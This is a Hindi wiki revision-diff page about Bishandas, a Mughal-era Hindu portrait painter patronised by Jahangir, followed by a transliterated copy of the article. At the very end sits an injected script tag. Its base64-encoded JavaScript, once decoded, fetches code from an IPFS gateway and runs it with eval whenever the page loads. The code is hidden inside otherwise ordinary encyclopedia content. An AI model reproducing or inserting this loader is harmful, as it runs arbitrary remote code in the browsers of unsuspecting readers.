Difference between revisions of "बिशनदास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[चित्र:Jahangir-by-Bishandas.jpg|जहाँगीर के समय की चित्रकला|thumb]]
+
[[चित्र:Jahangir-by-Bishandas.jpg|जहाँगीर के समय की चित्रकला|thumb|200px]]
'''बिशनदास''' एक ख्यातिप्राप्त [[हिन्दू]] चित्रकार थे। जिन्हें सम्राट [[जहाँगीर]] का संरक्षण प्राप्त था।
+
'''बिशनदास''' एक ख्यातिप्राप्त [[हिन्दू]] चित्रकार थे, जिन्हें [[मुग़ल]] [[जहाँगीर|बादशाह जहाँगीर]] का संरक्षण प्राप्त था। जहाँगीर ने अपने अग्रणी चित्रकार बिसनदास को अपने दूत [[ख़ान आलम]] के साथ [[फ़ारस]] के शाह के दरबार में चित्र बनाकर लाने के लिए भेजा था।
*बिशनदास 17वीं शताब्दी की [[मुग़ल]] [[चित्रकला]] की जहाँगीर शैली के सर्वाधिक प्रतिभाशाली व्यक्ति चित्रकारों में से एक थे।  
+
[[चित्र:Mughal-Paintings.jpg|left|thumb|जहाँगीर के समय की चित्रकला|left|200px]]
*उनके बारे में कोई भी जानकारी उपलब्ध नहीं है, लेकिन उनके नाम से उनके हिन्दू होने का संकेत मिलता है।
+
*बिशनदास 17वीं शताब्दी की [[मुग़ल चित्रकला]] की जहाँगीर शैली के सर्वाधिक प्रतिभाशाली व्यक्ति चित्रकारों में से एक थे।<br />
[[चित्र:Mughal-Paintings.jpg|left|thumb|जहाँगीर के समय की चित्रकला|left]]
+
<br />
'''बादशाह जहाँगीर ने बिशनदास की यह कहते हुए प्रशंसा की थी कि वह हूबहू चित्र बनाने में बेजोड़ थे'''। बिशनदास को [[फ़ारस]] के दूतावास में भेजा गया था, जहाँ वह शाह तथा उनके दरबार के प्रमुख व्यक्तियों के चित्र बनाने के लिए 1613 से 1620 तक रहे थे। बादशाह को चित्र इतने पसंद आए कि उन्होंने बिशनदास को उपहार में एक [[हाथी]] प्रदान किया था। फ़ारस के कुछ कुलीनों के मुग़ल शैली के व्यक्तिचित्रों को बिशनदास की कृति माना जा सकता है। उन्होंने अलौकिक कथाओं की पुस्तक अनवार-ए सुहेली (अब ब्रिटिश संग्रहालय में) और बादशाह के लिए बनाए गए चित्र संग्रहों में कई बेहतरीन व्यक्तिओं के चित्रों का योगदान दिया।
+
*उनके बारे में कोई भी जानकारी उपलब्ध नहीं है, लेकिन उनके नाम से उनके हिन्दू होने का संकेत मिलता है।<br />
 
+
<br />
{{लेख प्रगति  
+
*बादशाह जहाँगीर ने बिशनदास की यह कहते हुए प्रशंसा की थी कि- "वह हूबहू चित्र बनाने में बेजोड़ थे"<br />
|आधार=
+
<br />
|प्रारम्भिक=प्रारम्भिक1
+
*बिशनदास को [[फ़ारस]] के दूतावास में भेजा गया था, जहाँ वह शाह तथा उनके दरबार के प्रमुख व्यक्तियों के चित्र बनाने के लिए 1613 ई. से 1620 ई. तक रहे थे। बादशाह को चित्र इतने पसंद आए कि उन्होंने बिशनदास को उपहार में एक [[हाथी]] प्रदान किया था।<br />
|माध्यमिक=
+
<br />
|पूर्णता=
+
*फ़ारस के कुछ कुलीनों के मुग़ल शैली के व्यक्तिचित्रों को बिशनदास की कृति माना जा सकता है। उन्होंने अलौकिक कथाओं की पुस्तक 'अनवार-ए सुहेली' (अब ब्रिटिश संग्रहालय में) और बादशाह के लिए बनाए गए चित्र संग्रहों में कई बेहतरीन व्यक्तिओं के चित्रों का योगदान दिया।
|शोध=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
}}
+
==टीका टिप्पणी और संदर्भ==
 
+
<references/>
{| width="100%"
+
==बाहरी कड़ियाँ==
|-
+
*[https://www.indiaolddays.com/mugal-kala-chitrakala/ मुगल कलाः चित्रकला]
|
 
 
==संबंधित लेख==
 
==संबंधित लेख==
|-
+
{{मुग़ल साम्राज्य}}{{चित्रकार}}
|
+
[[Category:मध्य काल]][[Category:मुग़ल साम्राज्य]][[Category:चित्रकार]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:कला कोश]][[Category:इतिहास कोश]]
{{चित्रकार}}
 
{{मध्य काल}}
 
|}
 
 
 
[[Category:मुग़ल_साम्राज्य]]
 
[[Category:मध्य_काल]]
 
[[Category:चित्रकार]]
 
[[Category:कला_कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:01, 6 May 2020

jahaangir ke samay ki chitrakala|thumb|200px bishanadas ek khyatiprapt hindoo chitrakar the, jinhean mugal badashah jahaangir ka sanrakshan prapt tha. jahaangir ne apane agrani chitrakar bisanadas ko apane doot khan alam ke sath faras ke shah ke darabar mean chitr banakar lane ke lie bheja tha. left|thumb|jahaangir ke samay ki chitrakala|left|200px

  • bishanadas 17vian shatabdi ki mugal chitrakala ki jahaangir shaili ke sarvadhik pratibhashali vyakti chitrakaroan mean se ek the.


  • unake bare mean koee bhi janakari upalabdh nahian hai, lekin unake nam se unake hindoo hone ka sanket milata hai.


  • badashah jahaangir ne bishanadas ki yah kahate hue prashansa ki thi ki- "vah hoobahoo chitr banane mean bejo d the".


  • bishanadas ko faras ke dootavas mean bheja gaya tha, jahaan vah shah tatha unake darabar ke pramukh vyaktiyoan ke chitr banane ke lie 1613 ee. se 1620 ee. tak rahe the. badashah ko chitr itane pasand ae ki unhoanne bishanadas ko upahar mean ek hathi pradan kiya tha.


  • faras ke kuchh kulinoan ke mugal shaili ke vyaktichitroan ko bishanadas ki kriti mana ja sakata hai. unhoanne alaukik kathaoan ki pustak 'anavar-e suheli' (ab british sangrahalay mean) aur badashah ke lie banae ge chitr sangrahoan mean kee behatarin vyaktioan ke chitroan ka yogadan diya.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>